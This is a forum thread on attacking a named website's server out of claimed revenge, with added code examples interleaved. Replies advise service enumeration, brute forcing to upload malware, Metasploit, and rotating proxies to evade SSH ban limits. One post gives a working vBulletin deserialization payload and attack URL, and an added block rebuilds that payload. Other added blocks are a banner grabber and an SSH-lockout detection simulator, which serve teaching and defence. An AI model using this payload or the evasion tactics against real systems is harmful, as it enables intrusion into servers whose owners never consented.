
Options For Attacking A Web Server That Aren't Web Application Related

  1. #1
    SBTlauien African Astronaut
    Let's say hypothetically, that I was on a mission to attack niggasin.space. Lanny had rubbed me the wrong way (sexually) and I was going after his server for revenge. If I didn't want to attack his site via a potential web application vulnerability, what other options would I have?

    Let's split the question and say in one scenario that he had a bunch of ports open (like 22, 25, 80, 443, 631... all were for the default protocol), and in the other scenario he only had 80 and 443 open.
  2. #2
    DDoS and 10 trillion spambots.
  3. #3
    SBTlauien African Astronaut
    ^Oh gawd.

    New rule, no DoS-type attacks. Actual, real attacks that require at least a small amount of skill.
  4. #4
    SBTlauien African Astronaut
    I think I found my answer. It looks like I would have to find a vulnerability for whatever service is running on that particular port.

    Is it a dead end if Lanny only had port 80 open?
  5. #5
    Sophie Pedophile Tech Support
    Attack the services running on the webserver. Like FTP, POP3, the mailserver. Sometimes the MySQL DB listens on port 3306. You could bruteforce the file server and upload malware. Or see if there is a flaw in the service you are targeting itself that can be exploited with a buffer overflow or what have you. This is why it is important to enumerate the type of service you are dealing with and the version. One such technique involves banner grabbing with the FTP service to get the version and such. Once you know the version you can look for vulnerabilities on exploit-db and similar sites. Or download the exact same thing, run it locally and bang on it/reverse engineer until you find something.

    Nexpose and Metasploit are really good at server side security testing.
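    The enumeration step above (connect, read the greeting, pull out product and version) as an added example. This is my code, not Sophie's and not part of Nexpose or Metasploit; it is run here over constructed sample banners for FTP, SMTP, POP3, SSH and MySQL, and the product list and regexes are my own assumptions about what typical greetings look like.

```python
"""Banner grabbing and version extraction for services that speak first on connect."""
import re
import socket
from dataclasses import dataclass
from typing import Dict, Optional

# Product names this toy parser knows how to pick out of a text greeting (assumed list).
KNOWN_PRODUCTS = ("OpenSSH", "vsFTPd", "ProFTPD", "Pure-FTPd", "Postfix", "Exim",
                  "Sendmail", "Dovecot", "Courier")


@dataclass
class Banner:
    port: int
    product: Optional[str]
    version: Optional[str]
    raw: str


def _version_after(product: str, text: str) -> Optional[str]:
    """Version token directly following the product name: 'OpenSSH_7.4p1' -> '7.4p1'."""
    m = re.search(re.escape(product) + r"[ _/v-]*(\d+(?:\.\d+)+[\w.+-]*)", text)
    return m.group(1) if m else None


def parse_mysql_handshake(port: int, data: bytes) -> Banner:
    """MySQL greets with a binary packet: 3-byte length, 1-byte sequence id,
    protocol version byte (0x0a) and a NUL-terminated server version string."""
    if len(data) < 6 or data[4] != 0x0A:
        return Banner(port, None, None, data.hex())
    end = data.index(b"\x00", 5)
    version = data[5:end].decode("ascii", "replace")
    product = "MariaDB" if "MariaDB" in version else "MySQL"
    return Banner(port, product, version, version)


def parse_banner(port: int, data: bytes) -> Banner:
    """Turn the raw bytes a port volunteers into (product, version)."""
    if port == 3306:
        return parse_mysql_handshake(port, data)
    text = data.decode("ascii", "replace").strip()
    for product in KNOWN_PRODUCTS:
        if product.lower() in text.lower():
            return Banner(port, product, _version_after(product, text), text)
    return Banner(port, None, None, text)


def grab_banner(host: str, port: int, timeout: float = 3.0) -> Banner:
    """Connect and read whatever the server sends before we say anything.
    Works for FTP, SMTP, POP3, SSH and MySQL; HTTP needs a request first."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.settimeout(timeout)
        try:
            data = s.recv(1024)
        except socket.timeout:
            data = b""
    return parse_banner(port, data)


def mysql_packet(server_version: str) -> bytes:
    """Build a minimal MySQL greeting packet (constructed sample, not a capture)."""
    payload = b"\x0a" + server_version.encode() + b"\x00" + b"\x01\x00\x00\x00"
    return len(payload).to_bytes(3, "little") + b"\x00" + payload


# Constructed sample greetings; no real host was contacted to obtain these.
SAMPLE_BANNERS = {
    21: b"220 (vsFTPd 3.0.3)\r\n",
    22: b"SSH-2.0-OpenSSH_7.4p1 Debian-10+deb9u2\r\n",
    25: b"220 mail.example.test ESMTP Postfix (Ubuntu)\r\n",
    110: b"+OK Dovecot (Ubuntu) ready.\r\n",
    3306: mysql_packet("5.7.21-0ubuntu0.16.04.1"),
}


def enumerate_samples() -> Dict[int, Banner]:
    """Parse every sample as if grab_banner() had just returned it."""
    return {port: parse_banner(port, data) for port, data in SAMPLE_BANNERS.items()}


if __name__ == "__main__":
    for port, b in sorted(enumerate_samples().items()):
        print(f"{port:>5}  {b.product or '?':10} {b.version or '?':25} {b.raw}")
```

    Swap `enumerate_samples()` for `grab_banner(host, port)` against a box you are allowed to test; the product/version pair is what you then take to exploit-db. Banners lie (admins can edit them), so treat the result as a lead, not a finding.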
  6. #6
    Sophie Pedophile Tech Support
    Originally posted by SBTlauien I think I found my answer. It looks like I would have to find a vulnerability for whatever service is running on that particular port.

    Yeah this. Wrote my reply while you were writing yours lol.
  7. #7
    SBTlauien African Astronaut
    Guess I'm going to have to start learning about some of these tools (Metasploit specifically). Buffer overflows as well.
  8. #8
    -SpectraL coward [the spuriously bluish-lilac bushman]


    php << 'eof'
    <?php
    // Stand-in classes carrying only the names and properties the serialized
    // form needs; serialize() never looks at methods.
    class vB_Database {
        public $functions = array();

        public function __construct()
        {
            // Name of the callable that the PoC substitutes for the driver's
            // free_result; phpinfo is a harmless way to prove it gets invoked.
            $this->functions['free_result'] = 'phpinfo';
        }
    }

    class vB_dB_Result {
        // Protected, so serialize() writes the names as "\0*\0db" and
        // "\0*\0recordset" (the %00%2A%00 in the output below).
        protected $db;
        protected $recordset;

        public function __construct()
        {
            $this->db = new vB_Database();
            $this->recordset = 1;
        }
    }

    // Serialize the object graph and URL-encode it for use in a query string.
    print urlencode(serialize(new vB_dB_Result())) . "\n";
    eof
    O%3A12%3A%22vB_dB_Result%22%3A2%3A%7Bs%3A5%3A%22%00%2A%00db%22%3BO%3A11%3A%22vB_Database%22%3A1%3A%7Bs%3A9%3A%22functions%22%3Ba%3A1%3A%7Bs%3A11%3A%22free_result%22%3Bs%3A7%3A%22phpinfo%22%3B%7D%7Ds%3A12%3A%22%00%2A%00recordset%22%3Bi%3A1%3B%7D

    http://localhost/vbforum/ajax/api/hook/decodeArguments?arguments=O%3A12%3A%22vB_dB_Result%22%3A2%3A%7Bs%3A5%3A%22%00%2a%00db%22%3BO%3A11%3A%22vB_Database%22%3A1%3A%7Bs%3A9%3A%22functions%22%3Ba%3A1%3A%7Bs%3A11%3A%22free_result%22%3Bs%3A7%3A%22phpinfo%22%3B%7D%7Ds%3A12%3A%22%00%2a%00recordset%22%3Bi%3A1%3B%7D


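    To make the encoding in the post legible, here is an added example (my code, not SpectraL's and not vBulletin's): a minimal clone of PHP's serialize() in Python that rebuilds the exact string the snippet prints, so the length-prefixed fields and the %00%2A%00 property-name mangling can be read off directly. The class and property names come from the post; the serializer is mine and handles only ints, bools, strings, arrays and objects.

```python
"""Rebuild the PHP-serialized object graph from the post, byte for byte."""
from dataclasses import dataclass, field
from typing import Any, List, Tuple
from urllib.parse import quote_plus


@dataclass
class PhpObject:
    """A PHP object to serialize. props holds (name, visibility, value) triples."""
    class_name: str
    props: List[Tuple[str, str, Any]] = field(default_factory=list)


def mangle(name: str, visibility: str, class_name: str) -> str:
    """PHP prefixes non-public property names inside serialize() output:
    protected -> "\\0*\\0name", private -> "\\0Class\\0name"."""
    if visibility == "public":
        return name
    if visibility == "protected":
        return f"\x00*\x00{name}"
    if visibility == "private":
        return f"\x00{class_name}\x00{name}"
    raise ValueError(visibility)


def php_serialize(value: Any) -> str:
    """Minimal serialize(): ints, bools, None, strings, arrays (list/dict), objects."""
    if isinstance(value, bool):           # bool before int: bool subclasses int
        return f"b:{int(value)};"
    if isinstance(value, int):
        return f"i:{value};"
    if value is None:
        return "N;"
    if isinstance(value, str):            # length is in bytes, NULs included
        return f's:{len(value.encode())}:"{value}";'
    if isinstance(value, list):
        value = dict(enumerate(value))
    if isinstance(value, dict):
        body = "".join(php_serialize(k) + php_serialize(v) for k, v in value.items())
        return f"a:{len(value)}:{{{body}}}"
    if isinstance(value, PhpObject):
        body = "".join(php_serialize(mangle(n, vis, value.class_name)) + php_serialize(v)
                       for n, vis, v in value.props)
        return (f'O:{len(value.class_name)}:"{value.class_name}":'
                f"{len(value.props)}:{{{body}}}")
    raise TypeError(type(value))


def vbulletin_gadget() -> PhpObject:
    """The object graph from the post: a vB_dB_Result whose protected $db is a
    vB_Database with functions['free_result'] = 'phpinfo', and $recordset = 1."""
    db = PhpObject("vB_Database", [("functions", "public", {"free_result": "phpinfo"})])
    return PhpObject("vB_dB_Result", [("db", "protected", db), ("recordset", "protected", 1)])


def gadget_payload() -> str:
    """URL-encoded form, matching what PHP's urlencode() emits for these bytes."""
    return quote_plus(php_serialize(vbulletin_gadget()))


# The string the PHP snippet in the post prints, copied for comparison.
EXPECTED = "O%3A12%3A%22vB_dB_Result%22%3A2%3A%7Bs%3A5%3A%22%00%2A%00db%22%3BO%3A11%3A%22vB_Database%22%3A1%3A%7Bs%3A9%3A%22functions%22%3Ba%3A1%3A%7Bs%3A11%3A%22free_result%22%3Bs%3A7%3A%22phpinfo%22%3B%7D%7Ds%3A12%3A%22%00%2A%00recordset%22%3Bi%3A1%3B%7D"

if __name__ == "__main__":
    print(php_serialize(vbulletin_gadget()).replace("\x00", "\\0"))
    print(gadget_payload())
    print("matches post:", gadget_payload() == EXPECTED)
```

    Reading the decoded form, `O:12:"vB_dB_Result":2:{...}` is "object, class name of 12 bytes, 2 properties", and `s:5:"\0*\0db"` is the protected property `db` with its two NUL bytes counted in the length. Any unserialize() of attacker-controlled input instantiates whatever class names appear here; the defensive takeaway is to never feed user input to unserialize() and to pass an `allowed_classes` list where it cannot be avoided.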
  9. #9
    -SpectraL coward [the spuriously bluish-lilac bushman]
    http://legalhackers.com/advisories/vBulletin-SSRF-Vulnerability-Exploit.txt
  10. #10
    Lanny Bird of Courage
    Yeah, every attack has to be against some kind of service. Obviously an HTTP server is available on 80. Most servers will run SSH on 22 because for people like me, who rent a server in someone else's data center, it's literally the only way I can connect. Here at niggasin.space we allow ICMP connections and TCP connections on 22, 80, 443; everything else is firewalled from anywhere but the DB server and localhost. Nothing runs on 443, 80 is NGINX and uWSGI and 22 is sshd. Low-hanging fruit is someone leaving password login for root or a sudoer enabled so you can brute force SSH login. No dice in this case because you'll get a blanket ban on incoming connections with like 8 failures and you can only do key based auth, but that would be the usual initial strat.

    Following that there's a much higher chance of there being a critical bug in my homebrewed forum code which you can read in its entirety than in sshd which is also open source but far better reviewed.
  11. #11
    -SpectraL coward [the spuriously bluish-lilac bushman]
    That's why you use a "rotating IP" proxy, so you always have a different IP on every attempted connection.
  12. #12
    Sophie Pedophile Tech Support
    Originally posted by -SpectraL That's why you use a "rotating IP" proxy, so you always have a different IP on every attempted connection.

    You can do this from a defensive standpoint too. It's called an upstream proxy. But good luck rotating your upstream proxy without some DNS fast fluxing magic.

    Post last edited by Sophie at 2017-02-01T19:15:22.778167+00:00
  13. #13
    Sophie Pedophile Tech Support
    Originally posted by SBTlauien Guess I'm going to have to start learning about some these tools(Metasploit specifically). Bufferoverflows as well.

    Metasploit has an impressive array of exploits all on its own, including buffer overflows. Furthermore it is really easy to use. The hardest part is enumerating and positively identifying vulnerabilities when it comes to Metasploit. If you are looking for study materials related to Metasploit have a gander over here https://www.offensive-security.com/metasploit-unleashed/requirements/

    Get the Metasploitable distro from Offensive Security as well so you can do some labs. I have some experience with Metasploit so if you have any questions I would be happy to try and answer them for you as far as I am able.
  14. #14
    -SpectraL coward [the spuriously bluish-lilac bushman]
    Warning, though. Many "tools" have hidden author backdoors embedded in them. You play with matches, sometimes you get burnt.
  15. #15
    Sophie Pedophile Tech Support
    Originally posted by -SpectraL Warning, though. Many "tools" have hidden author backdoors embedded in them. You play with matches, sometimes you get burnt.

    Metasploitable is specifically built to be vulnerable. So you can do your testing on that. Obviously you wouldn't run a vulnerable distro as your main OS. You run it in a VM. Furthermore, Metasploit is completely open source and Rapid7 is one of the best security companies in the world. So I wouldn't worry about it, and if you're still worried, simply get a pentesting distro in a VM that has Metasploit pre-installed.
  16. #16
    -SpectraL coward [the spuriously bluish-lilac bushman]
    Some "tools" also have intelligent capabilities, whereupon if the tool detects certain people, in certain places, at certain times, under certain circumstances, it will completely fry the user's entire system and self-destruct, so beware.
  17. #17
    Sophie Pedophile Tech Support
    Originally posted by -SpectraL Some "tools" also have intelligent capabilities, whereupon if the tool detects certain people, in certain places, at certain times, under certain circumstances, it will completely fry the user's entire system and self-destruct, so beware.

    1. You don't scare me kid.
    2. All the tools I use are either built from source or are in an interpreted language so I just have a script. Good luck embedding this type of malware functionality into a tool that is on GitHub, open to review by the entire InfoSec and developer community.
  18. #18
    Lanny Bird of Courage
    Originally posted by -SpectraL That's why you use a "rotating IP" proxy, so you always have a different IP on every attempted connection.

    I mean you could but root login is disabled. You could easily guess my login-enabled account but a 1024-bit key over 8 attempts per IP is many orders of magnitude greater than the number of IPv6 addresses in the world, and even if somehow you got around the IP banning (you can't) and assuming an unrealistically low 50ms per attempt, then it would take on average somewhat more time to brute force the login to niggasin.space than the universe has existed for (which is significantly longer than you think it is).
  19. #19
    Sophie Pedophile Tech Support
    Originally posted by Lanny I mean you could but root login is disabled. You could easily guess my login-enabled account but a 1024-bit key over 8 attempts per IP is many orders of magnitude greater than the number of IPv6 addresses in the world, and even if somehow you got around the IP banning (you can't) and assuming an unrealistically low 50ms per attempt, then it would take on average somewhat more time to brute force the login to niggasin.space than the universe has existed for (which is significantly longer than you think it is).

    Oh lol, i thought spectral was talking about rotating proxies from the webserver perspective, like switching upstream proxies. My bad, should have paid better attention.
  20. #20
    -SpectraL coward [the spuriously bluish-lilac bushman]
    Originally posted by Lanny I mean you could but root login is disabled. You could easily guess my login-enabled account but a 1024-bit key over 8 attempts per IP is many orders of magnitude greater than the number of IPv6 addresses in the world, and even if somehow you got around the IP banning (you can't) and assuming an unrealistically low 50ms per attempt, then it would take on average somewhat more time to brute force the login to niggasin.space than the universe has existed for (which is significantly longer than you think it is).

    You left out the fact that the 8 attempts per IP is not permanent. I could cycle through the IP addresses again and again.
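    The exchange above (ban after about 8 failures per IP; bans expire, so cycle source addresses) as an added example, written by me and not by any poster here. It replays constructed sshd auth.log lines through a per-IP lockout of the kind Lanny describes, shows one address being banned, lapsing and being banned again, and shows six rotating addresses staying one try under the cap. It then goes one step beyond the thread: a per-account view that counts distinct source addresses, which is the check that catches the rotating pattern. Host name, user names and RFC 5737 addresses are invented; the 1-hour ban length and 10-minute window are assumptions.

```python
"""Per-IP SSH lockout vs. rotating source addresses, replayed over constructed auth.log lines."""
import re
from collections import defaultdict
from dataclasses import dataclass
from datetime import datetime, timedelta
from typing import Dict, List, Optional, Tuple

# sshd's "Failed <method> for [invalid user] <user> from <ip> port <n>" lines.
LINE_RE = re.compile(r"^(?P<ts>\w{3}\s+\d{1,2} \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
                     r"Failed \S+ for (?:invalid user )?(?P<user>\S+) from (?P<ip>\S+) port \d+")


@dataclass
class Failure:
    when: datetime
    user: str
    ip: str


def parse_failures(lines: List[str], year: int = 2017) -> List[Failure]:
    """Syslog timestamps carry no year; the caller supplies one (2017 assumed)."""
    out = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue  # accepted logins, disconnects etc. are not failures
        when = datetime.strptime(m["ts"].replace("  ", " "), "%b %d %H:%M:%S").replace(year=year)
        out.append(Failure(when, m["user"], m["ip"]))
    return out


class PerIpBan:
    """The control from the thread: max_failures from one address blocks that address.
    The block lapses after ban_for, which is the gap the rotating-address reply uses."""

    def __init__(self, max_failures: int = 8, ban_for: timedelta = timedelta(hours=1)):
        self.max_failures, self.ban_for = max_failures, ban_for
        self.counts: Dict[str, int] = defaultdict(int)
        self.banned_until: Dict[str, datetime] = {}

    def observe(self, f: Failure) -> Optional[str]:
        """Return the IP when this failure triggers a (new) ban, else None."""
        until = self.banned_until.get(f.ip)
        if until is not None and f.when < until:
            return None  # still blocked at the firewall
        if until is not None:  # ban lapsed: the counter starts from zero again
            del self.banned_until[f.ip]
            self.counts[f.ip] = 0
        self.counts[f.ip] += 1
        if self.counts[f.ip] >= self.max_failures:
            self.banned_until[f.ip] = f.when + self.ban_for
            return f.ip
        return None


def spray_alerts(failures: List[Failure], window: timedelta = timedelta(minutes=10),
                 min_ips: int = 5) -> Dict[str, int]:
    """Distinct source addresses per target account in a sliding window. Seven tries
    from each of many addresses never reach the per-IP cap, but the account-level
    view shows the run at once. Returns {user: peak distinct IPs} for alerts."""
    alerts: Dict[str, int] = {}
    by_user: Dict[str, List[Failure]] = defaultdict(list)
    for f in failures:
        by_user[f.user].append(f)
    for user, fs in by_user.items():
        fs.sort(key=lambda x: x.when)
        start = 0
        for i in range(len(fs)):
            while fs[i].when - fs[start].when > window:
                start += 1
            ips = {x.ip for x in fs[start:i + 1]}
            if len(ips) >= min_ips:
                alerts[user] = max(alerts.get(user, 0), len(ips))
    return alerts


def make_sample_log() -> List[str]:
    """Constructed auth.log excerpt: invented host and users, RFC 5737 addresses."""
    t0 = datetime(2017, 2, 1, 19, 0, 0)

    def failed(t: datetime, user: str, ip: str, port: int) -> str:
        return (f"{t:%b} {t.day:2d} {t:%H:%M:%S} host sshd[4242]: "
                f"Failed password for {user} from {ip} port {port} ssh2")

    lines = [f"{t0:%b} {t0.day:2d} {t0:%H:%M:%S} host sshd[4241]: "
             "Accepted publickey for alice from 192.0.2.10 port 39000 ssh2"]
    # One address hammering root: banned on the 8th try.
    lines += [failed(t0 + timedelta(seconds=i), "root", "203.0.113.9", 50000 + i) for i in range(8)]
    # Six rotating addresses, seven tries each against a real account: never banned.
    lines += [failed(t0 + timedelta(minutes=1, seconds=7 * n + i), "alice",
                     f"198.51.100.{n + 1}", 40000 + 7 * n + i) for n in range(6) for i in range(7)]
    # The first address returns two hours later, after its ban lapsed, and starts over.
    lines += [failed(t0 + timedelta(hours=2, seconds=i), "root", "203.0.113.9", 51000 + i) for i in range(8)]
    return lines


def run_detections(lines: List[str]) -> Tuple[List[str], Dict[str, int]]:
    """(IPs banned, in order, repeats allowed) and the per-account spray alerts."""
    policy, failures = PerIpBan(), parse_failures(lines)
    bans = [ip for ip in (policy.observe(f) for f in failures) if ip]
    return bans, spray_alerts(failures)


if __name__ == "__main__":
    print(run_detections(make_sample_log()))
```

    The per-IP policy bans 203.0.113.9 twice and never touches the six rotating addresses; the per-account count flags alice with six distinct sources inside the window. Neither check matters much once password authentication is off, which is the actual reason the brute force in this thread goes nowhere, but the account-level view is what tells you it is being attempted.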